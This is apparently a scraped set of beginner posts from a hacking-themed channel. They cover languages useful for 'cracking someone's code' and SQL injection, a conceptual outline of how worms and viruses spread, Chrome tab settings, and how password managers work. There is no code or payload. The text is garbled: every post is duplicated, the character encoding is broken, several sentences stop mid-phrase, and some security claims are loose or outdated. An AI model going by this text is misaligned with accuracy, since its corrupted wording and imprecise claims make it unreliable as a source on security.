As we all know, in order to break the rules, you need to know them first. The same principle works for programming: in order to crack someone's code, you must know how programming languages ββwork and be able to program yourself. Some of the more recommended languages ββfor learning:
A) Python: This is perhaps the best language for web development. Two large frameworks are written on it, on which a huge number of web applications have been created, these are Flask and Django. The language is well built and well documented. Most importantly, it is very easy to learn. By the way, many developers use Python to create simple and complete automation.
B) C ++: a language used in industrial programming. It is taught in schools and universities. Servers are written on it. I recommend that you start learning languages ββwith it, since it contains all the principles of OOP. Having learned to work with it, you can easily master other languages.
C) JavaScript, JQuery: Basically almost all sites use JS and JQuery. You need to be aware that these sites depend on JS, such as password forms. After all, some sites do not allow you to select and copy some information, do not allow you to download a file or view the content, however, to do this, it is enough to disable JS in the browser. Well, to disable JavaScript, you need to know: a) in what situations the work (protection) of the site depends on it; b) how JavaScript is connected and in what ways you can block scripts.
D) SQL: the fun part. All passwords, personal data are stored in databases written in SQL. The most common database management system is MySQL. To understand how to use MySQL injection, you need to know what MySQL injection is. To grasp the essence of MySQL injection, you need to know what MySQL queries are, what the syntax of these queries is, what the database structure is, how data is stored, what tables are, etc.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦why a beginer should Learn multiple programming languages ?
#forBeginers
As we all know, in order to break the rules, you need to know them first. The same principle works for programming: in order to crack someone's code, you must know how programming languages ββwork and be able to program yourself. Some of the more recommended languages ββfor learning:
A) Python: This is perhaps the best language for web development. Two large frameworks are written on it, on which a huge number of web applications have been created, these are Flask and Django. The language is well built and well documented. Most importantly, it is very easy to learn. By the way, many developers use Python to create simple and complete automation.
B) C ++: a language used in industrial programming. It is taught in schools and universities. Servers are written on it. I recommend that you start learning languages ββwith it, since it contains all the principles of OOP. Having learned to work with it, you can easily master other languages.
C) JavaScript, JQuery: Basically almost all sites use JS and JQuery. You need to be aware that these sites depend on JS, such as password forms. After all, some sites do not allow you to select and copy some information, do not allow you to download a file or view the content, however, to do this, it is enough to disable JS in the browser. Well, to disable JavaScript, you need to know: a) in what situations the work (protection) of the site depends on it; b) how JavaScript is connected and in what ways you can block scripts.
D) SQL: the fun part. All passwords, personal data are stored in databases written in SQL. The most common database management system is MySQL. To understand how to use MySQL injection, you need to know what MySQL injection is. To grasp the essence of MySQL injection, you need to know what MySQL queries are, what the syntax of these queries is, what the database structure is, how data is stored, what tables are, etc.
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦IDEAS & NOTE FOR BEGINERS :
#forBeginers
1) Worms (Worms)
network worms spread from one system to another through a network connection
. The network mechanism used by the worm to complete its own replication.
E-mail mechanism.
Remote execution capability.
Remote login capability. The
process of worm reproduction.
Check the host table or similar place where the remote system address is stored. Search for the system to be infected,
establish a connection with the remote host,
copy yourself into the remote system and run the copy of the
2) computer virus (Viruses), the
biological concept of a virus,
small DNA or RNA gene segments
According to statistics, as of 2000.11, there are a total of more than 55,000
viruses with the characteristics of
viruses.
Antivirus methods
π§ββοΈComputer viruses (referred to as viruses) are programs that can infect other programs. The main characteristics of viruses are as follows:
β Dependence.
β‘ The virus is contagious.
β’ The virus is latent.
β£ Viruses are destructive.
β€ The virus is targeted.
π§ββοΈThe structural :
-boot module of the virus is responsible for guiding the virus to the memory, protecting the corresponding storage space to prevent it from being overwritten by other programs, and modifying some necessary system parameters to prepare for the activation of the virus.
-The infection module is responsible for infecting viruses to other computer programs. It is the core of the entire virus program and consists of two parts: one part judges whether the infection conditions are met, and the other part implements the infection.
-The performance module virus trigger condition determines
the specific performance part of some viruses.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦IDEAS & NOTE FOR BEGINERS :
#forBeginers
1) Worms (Worms)
network worms spread from one system to another through a network connection
. The network mechanism used by the worm to complete its own replication.
E-mail mechanism.
Remote execution capability.
Remote login capability. The
process of worm reproduction.
Check the host table or similar place where the remote system address is stored. Search for the system to be infected,
establish a connection with the remote host,
copy yourself into the remote system and run the copy of the
2) computer virus (Viruses), the
biological concept of a virus,
small DNA or RNA gene segments
According to statistics, as of 2000.11, there are a total of more than 55,000
viruses with the characteristics of
viruses.
Antivirus methods
π§ββοΈComputer viruses (referred to as viruses) are programs that can infect other programs. The main characteristics of viruses are as follows:
β Dependence.
β‘ The virus is contagious.
β’ The virus is latent.
β£ Viruses are destructive.
β€ The virus is targeted.
π§ββοΈThe structural :
-boot module of the virus is responsible for guiding the virus to the memory, protecting the corresponding storage space to prevent it from being overwritten by other programs, and modifying some necessary system parameters to prepare for the activation of the virus.
-The infection module is responsible for infecting viruses to other computer programs. It is the core of the entire virus program and consists of two parts: one part judges whether the infection conditions are met, and the other part implements the infection.
-The performance module virus trigger condition determines
the specific performance part of some viruses.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How do I stop Google Chrome from Restoring Tabs?
#forBeginers
Β» Method of Stopping Google Chrome from Restoring Tabs:
For stopping Google Chrome from restoring tabs, you will need to perform the following steps:
1) Launch Google Chrome by double-clicking on its shortcut icon located on your desktop.
2) Now click on the three dots located at the top right corner of your Google Chrome window
3) As soon as you will click on this icon, a cascading menu will appear on your screen. Select the Settings option from this menu
4) In the Google Chrome Settings window, scroll down to the βOn start-upβ section and then select the Open the New Tab page radio button as highlighted in the image shown below for restricting Google Chrome from restoring tabs.
Don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How do I stop Google Chrome from Restoring Tabs?
#forBeginers
Β» Method of Stopping Google Chrome from Restoring Tabs:
For stopping Google Chrome from restoring tabs, you will need to perform the following steps:
1) Launch Google Chrome by double-clicking on its shortcut icon located on your desktop.
2) Now click on the three dots located at the top right corner of your Google Chrome window
3) As soon as you will click on this icon, a cascading menu will appear on your screen. Select the Settings option from this menu
4) In the Google Chrome Settings window, scroll down to the βOn start-upβ section and then select the Open the New Tab page radio button as highlighted in the image shown below for restricting Google Chrome from restoring tabs.
Don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How do password managers work?
#ForBeginers
1) Password Manager saves all user access codes. At the same time, he needs to remember only one master password in order to enter such a figurative notebook with notes. There is no need to be afraid that someone will crack this code and gain access to all accounts at the same time. Just choose a strong master password that you haven't used anywhere else.
2) AES encryption is responsible for data security , so the key length is 256 bits and cannot be cracked. Unlocking such a master password is possible only if the code is entered correctly.
3) Among the managers there are those who work in online or offline modes. The online manager encrypts logins and passwords on their servers. Some services automatically enter passwords on sites (this requires a browser extension). The program synchronizes codes from a computer, smartphone, tablet and other user devices.
4) A few reminders to create passwords
With a password manager, you can do everything according to the rules and not be afraid to forget something. The user is guessing the password. It is desirable that it should consist of at least 10 characters and contain a variety of letters and signs. Passwords need to be changed from time to time.
5) Safeguarding data
One of the most reliable password managers is MultiPassword ( official site ). The program uses several encryption technologies simultaneously: AES-256, RSA, HKDF, PBKDF2. The encryption and decryption processes occur exclusively on the user's device, so even the developers of the utility cannot gain access to the data.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦How do password managers work?
#ForBeginers
1) Password Manager saves all user access codes. At the same time, he needs to remember only one master password in order to enter such a figurative notebook with notes. There is no need to be afraid that someone will crack this code and gain access to all accounts at the same time. Just choose a strong master password that you haven't used anywhere else.
2) AES encryption is responsible for data security , so the key length is 256 bits and cannot be cracked. Unlocking such a master password is possible only if the code is entered correctly.
3) Among the managers there are those who work in online or offline modes. The online manager encrypts logins and passwords on their servers. Some services automatically enter passwords on sites (this requires a browser extension). The program synchronizes codes from a computer, smartphone, tablet and other user devices.
4) A few reminders to create passwords
With a password manager, you can do everything according to the rules and not be afraid to forget something. The user is guessing the password. It is desirable that it should consist of at least 10 characters and contain a variety of letters and signs. Passwords need to be changed from time to time.
5) Safeguarding data
One of the most reliable password managers is MultiPassword ( official site ). The program uses several encryption technologies simultaneously: AES-256, RSA, HKDF, PBKDF2. The encryption and decryption processes occur exclusively on the user's device, so even the developers of the utility cannot gain access to the data.
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β